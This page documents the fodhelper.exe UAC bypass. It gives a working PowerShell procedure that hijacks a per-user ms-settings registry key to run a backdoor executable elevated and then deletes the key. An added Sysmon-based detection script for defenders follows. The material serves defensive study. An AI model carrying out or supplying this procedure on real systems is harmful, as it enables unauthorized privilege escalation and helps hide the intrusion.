UAC Bypass

UAC Bypass technique I - fodhelper.exe

Procedure

PS> $command = "C:\Temp\backdoor.exe"
PS> New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
PS> New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
PS> Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $command -Force
PS> Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
PS> Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force

Technical Context

fodhelper.exe (the Features on Demand helper) runs as a high-integrity process without showing a UAC prompt, so that it can install optional Windows features such as typing and text-to-speech components. @winscripting found that fodhelper.exe consults the registry keys below, which live under HKCU and are therefore writable by the unprivileged user; a command stored there is executed in the elevated context. The registry paths are:

HKCU:\Software\Classes\ms-settings\shell\open\command
HKCU:\Software\Classes\ms-settings\shell\open\command\DelegateExecute

Analytic I

Coming Soon
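The page's own analytic is still marked "Coming Soon"; what follows is an added defender-side example, not part of the original page. It checks a host for the two artefacts the procedure above leaves behind: the per-user ms-settings command key (which has no legitimate reason to exist under HKCU) and, because the final Remove-Item in the procedure wipes the live key, the Sysmon registry-write events (IDs 12/13) and process-creation events (ID 1) that record it. It assumes Sysmon is installed with a configuration that logs those event types, and that the session is elevated enough to read the Sysmon operational log; the field names used (TargetObject, Details, Image, ParentImage, IntegrityLevel) are Sysmon's standard EventData names.

```powershell
# Added detection example (not part of the original page).
# Assumes Sysmon with registry (EventID 12/13) and process-create (EventID 1) logging enabled.

$SuspectKey = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command'
$KeyPattern = '\\Classes\\ms-settings\\Shell\\Open\\command'
$Findings   = New-Object System.Collections.Generic.List[object]

# 1. Live state: a per-user override of the ms-settings ProgID is itself an indicator.
if (Test-Path $SuspectKey) {
    $props = Get-ItemProperty -Path $SuspectKey
    $Findings.Add([pscustomobject]@{
        Source = 'Registry'
        Detail = "Key present; (default)='$($props.'(default)')'; DelegateExecute set: $($null -ne $props.DelegateExecute)"
    })
}

# 2. Historical evidence from Sysmon: the cleanup step does not erase these events.
$filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1, 12, 13 }
$events = Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue

foreach ($e in $events) {
    # Flatten the EventData <Data Name="..."> elements into a hashtable.
    $xml  = [xml]$e.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

    switch ($e.Id) {
        { $_ -in 12, 13 } {
            # Any process creating or setting a value under the hijack path.
            if ($data.TargetObject -match $KeyPattern) {
                $Findings.Add([pscustomobject]@{
                    Source = "Sysmon $($e.Id)"
                    Detail = "$($e.TimeCreated) $($data.Image) -> $($data.TargetObject) = $($data.Details)"
                })
            }
        }
        1 {
            # Heuristic: a high-integrity child of fodhelper.exe whose image lives outside
            # C:\Windows (e.g. the C:\Temp payload in the procedure above) is not expected.
            if ($data.ParentImage -like '*\fodhelper.exe' -and
                $data.IntegrityLevel -eq 'High' -and
                $data.Image -notlike "$env:SystemRoot\*") {
                $Findings.Add([pscustomobject]@{
                    Source = 'Sysmon 1'
                    Detail = "$($e.TimeCreated) fodhelper.exe spawned $($data.Image) ($($data.CommandLine))"
                })
            }
        }
    }
}

if ($Findings.Count -eq 0) {
    Write-Output 'No fodhelper UAC-bypass indicators found.'
} else {
    $Findings | Format-Table -AutoSize -Wrap
}
```

The registry check alone is only useful if the key is inspected before the attacker's cleanup step; the Sysmon branch is the durable part of the analytic, and the process-creation heuristic should be tuned to the environment (for example, software that legitimately installs under Program Files would need a broader allow-list than the SystemRoot prefix used here).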

Reference
